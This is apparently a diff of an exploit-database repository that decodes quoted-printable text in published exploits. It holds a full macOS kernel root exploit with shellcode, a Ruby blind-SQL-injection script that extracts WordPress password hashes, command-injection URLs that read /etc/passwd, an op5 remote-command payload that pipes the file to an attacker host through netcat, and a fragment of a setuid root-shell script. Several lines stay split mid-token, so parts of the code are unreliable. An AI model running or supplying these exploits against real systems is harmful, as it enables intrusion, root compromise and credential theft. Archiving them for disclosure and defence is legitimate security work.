/app/api/rpc/users/get?offset=OFFSET
will return the following:


@ -12,13 +12,13 @@ Details:
CA 2E Web Option (r8.1.2) and potentially others, is vulnerable to unauthenticated privilege escalation via a predictable session token.
The POST parameter session token W2E_SSNID appears as follows:
W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE
W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE
JuNX9GoVjCEbqIuKh6kFRvbzYnUxgQtONszJldyAar3LtTSwsmBLpdlPc5iDH4Zf75
However, this token is poorly validated, leading to
W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013
W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013
being accepted as a valid session. By incrementing and
decrementing the digits at the end of the value given above, it is
@ -27,7 +27,7 @@ part of the login page, and as such, can be manipulated by an
unauthenticated attacker, giving them access to any valid session.
Consequentially, it is possible to access the following page as such:
https://app.domain.co.uk/web2edoc/close.htm?SSNID=3DW90NIxGoSsN1023ZYW2E735182000026
https://app.domain.co.uk/web2edoc/close.htm?SSNID=W90NIxGoSsN1023ZYW2E735182000026
Ending the session specified, which could lead to a denial of service condition.


@ -3,7 +3,7 @@
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
@ -37,10 +37,10 @@ Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result =3D $_POST;
Line 44: $result = $_POST;
[...]
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id=3D"'.*$result['fm_form_id']*.'";');
Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id="'.*$result['fm_form_id']*.'";');
[...]
3. Proof of concept
@ -52,19 +52,19 @@ X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and
"a"="a&action=fm_form&fm_form_referer=%2F
4. Explanation
---------------------
A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
formulary with fm_form_id="1" and the JSON message received will be simil=
ar
to:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
@ -72,11 +72,11 @@ The second time he tries to do the same with the same email the message
returned will be:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
If we insert *1**" and substr(user(),1,1)="a *we'll receive either the sa=
me
message indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message

544
platforms/osx/local/39675.c Executable file

@ -0,0 +1,544 @@
/*
T A L O S V U L N D E V
Proof-of-Concept Exploit
Advisory: http://www.talosintel.com/reports/TALOS-2016-0088/
Snort rules: 37517, 37518
CVE-2016-1743
Author: Piotr Bania, Cisco Talos
Target: Apple Intel HD 3000 Graphics driver
Impact: Local Privilege Escalation (root)
Tested Configuration:
Apple Intel HD 3000 Graphics driver 10.0.0
Darwin Kernel Version 15.2.0
OSX 10.11.2
Compilation:
gcc TALOS-2016-0088_poc.c lsym.m -o TALOS-2016-0088_poc -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
kudos:
qwertyoruiop (i've grabbed the lsym thing from you)
technical information (AppleIntelHD3000Graphics driver 10.0.0) :
...
__text:000000000001AA4E mov ecx, [rcx]
__text:000000000001AA50 add ecx, ecx
__text:000000000001AA52 sub eax, ecx
__text:000000000001AA54 cmp rbx, rax
__text:000000000001AA57 ja loc_1AC8C
__text:000000000001AA5D mov [rbp+var_54], esi
__text:000000000001AA60 mov rax, [rdi]
__text:000000000001AA63 mov esi, 168h
__text:000000000001AA68 call qword ptr [rax+980h] ; # WE CAN CONTROL THIS #
Expected output:
mac-mini:bug mini$ uname -a
Darwin BLAs-Mac-mini 15.2.0 Darwin Kernel Version 15.2.0: Fri Nov 13 19:56:56 PST 2015; root:xnu-3248.20.55~2/RELEASE_X86_64 x86_64
mac-mini:bug mini$ ./TALOS-2016-0088_poc
----------------------------------------------------------------
APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11
by Piotr Bania / CISCO TALOS
----------------------------------------------------------------
Alloc: deallocating!
Alloc: allocating 0x2000 (0x00000000 - 0x00002000)bytes
Alloc: vm_allocate ok, now vm_protect ...
Alloc: vm_allocate returned = 0 - addr = 0x00000000, vm_protect ok, filling
Mapping the kernel
MapKernel: kernel mapped
Initializing service
InitService: Trying: Gen6Accelerator
InitService: service ok!
Commencing stage 1
Stage1: Copying the stage1 payload 0x00001000 - 0x00001071
Stage1: Setting up the RIP to 0x00001000
Stage1: Copying trigger data
Stage1: Making stage1 call
Stage1: leaked kernel address 0xffffff8021e00000
Stage1: kernel address leaked, success!
ResolveApi: using kernel addr 0xffffff8021e00000 (file base = 0xffffff8000200000)
ResolveApi: _current_proc = 0xffffff8022437a60
ResolveApi: _proc_ucred = 0xffffff80223a9af0
ResolveApi: _posix_cred_get = 0xffffff802237e780
ResolveApi: _chgproccnt = 0xffffff80223a8400
Commencing stage 2
Stage2: preparing the stage2 payload
Stage2: Copying the stage2 payload 0x00001000 - 0x00001071
Stage2: Setting up the RIP to 0x00001000
Stage2: Copying trigger data
Stage2: Making stage2 call
Stage2: success, got root!
Stage2: now executing shell
sh-3.2# whoami
root
sh-3.2#
*/
#include "import.h"
/**
defines
**/
#define MEM_SIZE 0x2000
#define PAYLOAD_MEM_START 0x1000
#define INIT_SIG 0x0210010100000008
#define OFFSET_PAYLOAD_EXEC 0x980
#define OFFSET_ROOM 64
#define RESOLVE_SYMBOL_MY(map, name) lsym_find_symbol(map, name) - base + KernelAddr
/**
stage 1 payload - get kernel address and put it to 0x1000
; memory space for kernel address
nop
nop
nop
nop
nop
nop
nop
nop
save_regs64
; get msr entry
mov rcx, 0C0000082h ; lstar
rdmsr ; MSR[ecx] --> edx:eax
shl rdx, 32
or rax, rdx
; find kernel addr - scan backwards
MAX_KERNEL_SCAN_SIZE equ 10000h
KERNEL_SIG equ 01000007FEEDFACFh
PAGE_SIZE equ 1000h
mov rcx, MAX_KERNEL_SCAN_SIZE
and rax, not 0FFFFFh
xor rdx, rdx
mov r8, KERNEL_SIG
scan_loop:
sub rax, PAGE_SIZE
dec rcx
jz scan_done
; is sig correct?
cmp qword [rax], r8
jnz scan_loop
mov rdx, rax
scan_done:
; store the addr - rdx kernel addr, 0 if not found
lea rcx, [shell_start]
mov qword [rcx], rdx
load_regs64
xor rax, rax
xor r15, r15
ret
**/
unsigned char stage1[113] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55,
0x41, 0x56, 0x41, 0x57, 0x48, 0xB9, 0x82, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x32,
0x48, 0xC1, 0xE2, 0x20, 0x48, 0x09, 0xD0, 0x48, 0xC7, 0xC1, 0x00, 0x00, 0x01, 0x00, 0x48, 0x25,
0x00, 0x00, 0xF0, 0xFF, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0xCF, 0xFA, 0xED, 0xFE, 0x07, 0x00, 0x00,
0x01, 0x48, 0x2D, 0x00, 0x10, 0x00, 0x00, 0x48, 0xFF, 0xC9, 0x74, 0x08, 0x4C, 0x39, 0x00, 0x75,
0xF0, 0x48, 0x89, 0xC2, 0x48, 0x8D, 0x0D, 0xA5, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x11, 0x41, 0x5F,
0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF,
0xC3
};
/**
stage 2 payload - escalate
jmp over_api_table
api_current_proc dq 0
api_proc_ucred dq 0
api_posix_cred_get dq 0
api_chgproccnt dq 0
over_api_table:
save_regs64
mov rax, qword [api_current_proc]
call rax
mov rdi, rax ; rdi = cur_proc
; system v abi - rdi first arg
mov rax, qword [api_proc_ucred]
call rax
; rax = cur_ucred
mov rdi, rax
mov rax, qword [api_posix_cred_get]
call rax
; rax = pcred
mov dword [rax], 0
mov dword [rax+8], 0
load_regs64
xor rax, rax
xor r15, r15
ret
**/
#define OFF_API_START 2
#define OFF_API_CURRENT_PROC OFF_API_START
#define OFF_API_PROC_UCRED OFF_API_CURRENT_PROC + 8
#define OFF_API_POSIX_CRED_GET OFF_API_PROC_UCRED + 8
#define OFF_API_CHGPROCCNT OFF_API_POSIX_CRED_GET + 8 // not used in this example
unsigned char stage2[111] = {
0xEB, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B,
0x05, 0xCD, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC9, 0xFF, 0xFF,
0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC5, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0xC7,
0x00, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E,
0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF, 0xC3
};
/**
globals
**/
uint64_t mem;
io_connect_t conn;
uint64_t KernelAddr = 0;
lsym_map_t* MappingKernel = 0;
uint64_t api_current_proc = 0;
uint64_t api_proc_ucred = 0;
uint64_t api_posix_cred_get = 0;
uint64_t api_chgproccnt = 0;
/**
functions
**/
uint64_t Alloc(uint32_t addr, uint32_t sz)
{
mach_error_t k_error;
printf("Alloc: deallocating! \n");
vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
printf("Alloc: allocating 0x%x (0x%08x - 0x%08x) bytes\n", sz, addr, addr+sz);
k_error = vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_allocate() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate ok, now vm_protect ...\n");
k_error = vm_protect(mach_task_self(), addr, sz, 0, 7); //rwx
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_protect() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate returned = %d - addr = 0x%08x, vm_protect ok, filling\n", k_error, addr);
while(sz--) *(char*)(addr+sz)=0;
return addr;
}
int MapKernel(void)
{
MappingKernel = lsym_map_file("/mach_kernel");
if (!MappingKernel || !MappingKernel->map)
{
MappingKernel = lsym_map_file("/System/Library/Kernels/kernel");
}
if (!MappingKernel || !MappingKernel->map)
{
printf("MapKernel: unable to map kernel, quiting \n");
return -1;
}
printf("MapKernel: kernel mapped \n");
return 1;
}
int ResolveApi(void)
{
uint64_t base = lsym_kernel_base(MappingKernel);
api_current_proc = RESOLVE_SYMBOL_MY(MappingKernel, "_current_proc");
api_proc_ucred = RESOLVE_SYMBOL_MY(MappingKernel, "_proc_ucred");
api_posix_cred_get = RESOLVE_SYMBOL_MY(MappingKernel, "_posix_cred_get");
api_chgproccnt = RESOLVE_SYMBOL_MY(MappingKernel, "_chgproccnt");
printf("ResolveApi: using kernel addr 0x%016llx (file base = 0x%016llx) \n", KernelAddr, base);
printf("ResolveApi: _current_proc = 0x%016llx \n", api_current_proc);
printf("ResolveApi: _proc_ucred = 0x%016llx \n", api_proc_ucred);
printf("ResolveApi: _posix_cred_get = 0x%016llx \n", api_posix_cred_get);
printf("ResolveApi: _chgproccnt = 0x%016llx \n", api_chgproccnt);
return 1;
}
int InitService(char *IoServiceName)
{
int type;
io_service_t service;
CFMutableDictionaryRef matching;
io_iterator_t iterator;
printf("InitService: Trying: %s \n", IoServiceName);
matching = IOServiceMatching(IoServiceName);
if( !matching)
{
printf("Initservice: IOServiceMatching() failed \n");
return -1;
}
if (IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator) != KERN_SUCCESS)
{
printf("InitService: IOServiceGetMatchingServices failed \n");
return -1;
}
service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL)
{
printf("InitService: IOIteratorNext failed \n");
return -1;
}
type = 0;
conn = MACH_PORT_NULL;
if (IOServiceOpen(service, mach_task_self(), 5, &conn) != KERN_SUCCESS)
{
printf("InitService: IOServiceOpen failed! \n");
return -1;
}
printf("InitService: service ok! \n");
return 1;
}
int Stage1(void)
{
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage1: Copying the stage1 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage1, sizeof(stage1));
printf("Stage1: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage1: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage1: Making stage1 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
KernelAddr = *(uint64_t*)PAYLOAD_MEM_START;
printf("Stage1: leaked kernel address 0x%016llx \n", KernelAddr);
if ((KernelAddr == 0) || (KernelAddr == 0x90909090))
{
printf("Stage1: fatal kernel address is wrong, exiting \n");
return -1;
}
printf("Stage1: kernel address leaked, success! \n");
return 1;
}
int Stage2(void)
{
int i;
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage2: preparing the stage2 payload \n");
unsigned char *t = (unsigned char*)&stage2;
*(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc;
*(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred;
*(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get;
*(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt;
printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2));
printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage2: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage2: Making stage2 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
setuid(0);
if (getuid() == 0)
{
printf("Stage2: success, got root! \n");
printf("Stage2: now executing shell \n");
system("/bin/sh");
exit(0);
}
printf("Stage2: failed! \n");
return -1;
}
int main(void)
{
printf(" ---------------------------------------------------------------- \n");
printf(" APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 \n");
printf(" by Piotr Bania / CISCO TALOS \n");
printf(" ---------------------------------------------------------------- \n\n\n");
IOServiceClose(0);
IOServiceOpen(0, 0, 0, 0);
// if this fails and we are done
mem = Alloc(0, MEM_SIZE);
printf("Mapping the kernel \n");
if (MapKernel() == -1)
return -1;
printf("Initializing service \n");
if (InitService("Gen6Accelerator") == -1)
return -1;
printf("Commencing stage 1 \n");
if (Stage1() == -1)
return -1;
if (ResolveApi() == -1)
return -1;
printf("Commencing stage 2 \n");
Stage2();
return 1;
}


@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/9831/info
The Confixx PERL debugging utility functionality has been reported to be prone to a remote command execution vulnerability. The issue is reported to occur when a command sequence is appended to a HTTP request for a PERL script resource, the command sequence must contain a prefixed ';' semi-colon character. When this request is processed, the command sequence will be reportedly executed with the privileges of the process that invokes the Confixx PERL debugging utility.
; /bin/cat location_of_Confixx_config_file
http://www.example.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd
http://www.example.com/user/tools_cgicheck2.php?dir=&file=%20./x%20|/bin/cat%20/etc/passwd


@ -5,15 +5,14 @@
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patc=
h (cli)
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
##############
# Description:
##############
# The "order" and "orderby" parameter is vulnerable for SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din=
ic_faq&orderby=3D<sqli>
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=in=
ic_faq&orderby=<sqli>
# PoC take some time to finish (15min on my Testsystem).
# I could speed it up with Multithreading but I'm to lazy right now
@ -22,22 +21,22 @@ ic_faq&orderby=3D<sqli>
###################################
#
# function prepare_items() {
# $this->_column_headers =3D array($this->_columns, $this->_hidden_columns=
# $this->_column_headers = array($this->_columns, $this->_hidden_columns=
, $this->_sortable_columns);
# $sort_order =3D isset($_GET['order']) ? $_GET['order'] : "ASC";
# $orderby_column =3D isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby=
# $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC";
# $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby=
']} {$sort_order}" : false;
#
# global $wpdb;
# if (is_array($this->_sql)) {
# if ($orderby_column =3D=3D false) {
# $data =3D $this->_sql;
# if ($orderby_column == false) {
# $data = $this->_sql;
# } else {
# $data =3D $this->_sql;
# $data = $this->_sql;
# usort($data, array(&$this, 'usort_reorder'));
# }
# } else {
# $data =3D $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A=
# $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A=
);
# }
###########################################################################=
@ -51,47 +50,47 @@ ic_faq&orderby=3D<sqli>
require "net/http"
require "uri"
$target =3D "" # EDIT ME #
$cookie =3D "" # EDIT ME # authenticated user session
$target = "" # EDIT ME #
$cookie = "" # EDIT ME # authenticated user session
# Example:
#$target =3D "http://127.0.0.1:9001/wordpress/"
#$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin%7C13640405=
45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor%3Dhtml; wp-se=
ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony%40bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp%3A%2F%2Fs=
ucker.de; wordpress_test_cookie=3DWP+Cookie+check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=3Dadmin%7C1364040545%7Cd7053b96adaa95745023b91=
694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=3D1"
#$target = "http://127.0.0.1:9001/wordpress/"
#$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin%7C13640405=
45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor%3Dhtml; wp-se=
ttings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony%40bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http%3A%2F%2Fs=
ucker.de; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=admin%7C1364040545%7Cd7053b96adaa95745023b91=
694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=1"
if $target.eql?("") or $cookie.eql?("")
puts "\n[!]\tPlease set $target and $cookie variable\n"
raise
end
$chars =3D ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
$hash =3D "$P$"
$i =3D 0 # chars index
$j =3D 4 # hash index
$chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
$hash = "$P$"
$i = 0 # chars index
$j = 4 # hash index
def sqli_send()
sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*=
(SELECT table_name FROM information_schema.tables)END) --")
uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby=
=3D#{sqli}")
http =3D Net::HTTP.new(uri.host, uri.port)
uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby=
=#{sqli}")
http = Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stderr)
request =3D Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
request = Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
rv:19.0) Gecko/20100101 Firefox/19.0"
request["Cookie"] =3D $cookie
resp =3D http.request(request)
if( resp.code !=3D "200" )
puts "something is wrong response =3D #{resp.code}"
request["Cookie"] = $cookie
resp = http.request(request)
if( resp.code != "200" )
puts "something is wrong response = #{resp.code}"
raise
end
# In WordPress default settings there will no SQL error displayed
@ -101,17 +100,17 @@ j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
end
def print_status()
output =3D "HASH: #{$hash} try #{$chars[$i]}"
output = "HASH: #{$hash} try #{$chars[$i]}"
print "\b"*output.length + output
end
while( $hash.length < 34 )
if( !sqli_send() )
$hash +=3D $chars[$i]
$j +=3D 1
$i =3D 0
$hash += $chars[$i]
$j += 1
$i = 0
else
$i +=3D 1
$i += 1
end
print_status()
end
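Review bot: The quoted-printable cleanup in this section is incomplete: `=3D` is rewritten to `=`, but the soft line breaks (a trailing `=` at the end of a wrapped line) are left in place, so lines such as `# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=in=` / `ic_faq&orderby=<sqli>`, the `$cookie` example and the string literals inside `sqli_send()` are still split mid-token and the new side is presumably not the script as originally published. The same leftover soft breaks appear in the later sections for the UnixWare xauto and uidadmin C exploits, the Solaris mail exploit, the FastTrack httpd exploit and the Winamp playlist exploit, and the Tower Toppler Perl section additionally keeps `=20` (an encoded trailing space) after its `$ENV` assignments. A full decode (every `=XX` hex escape plus joining lines that end in a bare `=`) would be the consistent fix across all of them.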


@ -4,7 +4,7 @@ Round Cube will reportedly reveal its installation path in an error message outp
Requesting this link:
http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=3Dma%60il
http://xxxx.com/roundcube/?_auth=cf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=ma%60il
Caused this error message:

138
platforms/php/webapps/39676.txt Executable file

@ -0,0 +1,138 @@
[+] Credits: hyp3rlinx
[+] Website: http://hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt
Vendor:
============
www.op5.com
Product:
===========
op5 v7.1.9
op5 Monitor is a software product for server, Network monitoring and
management based on the open source Project Nagios.
Vulnerability Type:
========================
Remote Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
op5 has a CSRF entry point that can be used to execute arbitrary remote
commands on op5 system sent via HTTP GET requests, allowing attackers
to completely takeover the affected host, to be victimized a user must be
authenticated and visit a malicious webpage or click an infected link...
Reference:
https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/
Exploit code(s):
===============
trivial RCE cat /etc/passwd... using netcat
nc.exe -vvlp 5555 > passwds.txt
https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%205555
<https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20%7C%20nc%20192.168.1.102%205555>
result:
listening on [any] 5555 ...
192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT
sent 0, rcvd 1343
C:\netcat-win32-1.12>type passwds.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smstools:x:499:499::/var/lib/smstools:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
op5lsu:x:500:500::/home/op5lsu:/bin/bash
saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
monitor:x:299:48::/opt/monitor:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
Disclosure Timeline:
============================================
Vendor Notification: March 27, 2016
Vendor confirms vulnerability March 27, 2016
Vendor issue patched new release v7.2.0 April 5, 2016
April 6, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=================================================================
Request Method(s): [+] GET
Vulnerable Product: [+] op5 v7.1.9
Vulnerable Parameter(s): [+] 'cmd_str'
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx


@ -33,21 +33,21 @@ ed
#
###########################################################
$ui_source =3D "/home/xnec/ui.c";
$ui_dest =3D "/home/xnec/ui";
$ui_code =3D "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc =3D "/etc/security/tcb/privs";
$uidatafile=3D"/tmp/uidata";
$sumpath =3D "/usr/bin/sum";
$uidata_sym =3D "/tmp/uidata.tmp";
$compiler =3D "cc";
$uidadmin =3D "/usr/bin/uidadmin";
$ui_source = "/home/xnec/ui.c";
$ui_dest = "/home/xnec/ui";
$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc = "/etc/security/tcb/privs";
$uidatafile="/tmp/uidata";
